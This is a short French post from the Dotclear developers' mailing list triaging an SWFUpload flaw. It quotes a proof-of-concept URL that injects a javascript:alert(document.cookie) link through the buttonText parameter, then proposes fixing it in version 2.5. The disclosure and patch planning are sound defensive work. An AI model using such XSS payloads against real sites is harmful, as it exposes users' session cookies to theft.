Re: [Dotclear Dev] Hacking Expose!: Vulnerabilities in SWFUpload in multiple webapplications: WordPress, Dotclear, InstantCMS, AionWeb and others

Dsls Mon, 11 Mar 2013 22:55:52 -0700

Le 12 mars 2013 06:54, Dsls <[email protected]> a écrit :
> poc sur dotclear:
> <urldublog>/admin/index.php?pf=swfupload.swf&buttonText=<a%20href=%27javascript:alert(document.cookie)%27>Click%20me</a>
>
> On est bien vulnérable.


à intégrer dans la 2.5 je pense
_______________________________________________
Dev mailing list - [email protected] - http://ml.dotclear.org/listinfo/dev

Re: [Dotclear Dev] Hacking Expose!: Vulnerabilities in SWFUpload in multiple webapplications: WordPress, Dotclear, InstantCMS, AionWeb and others

Répondre à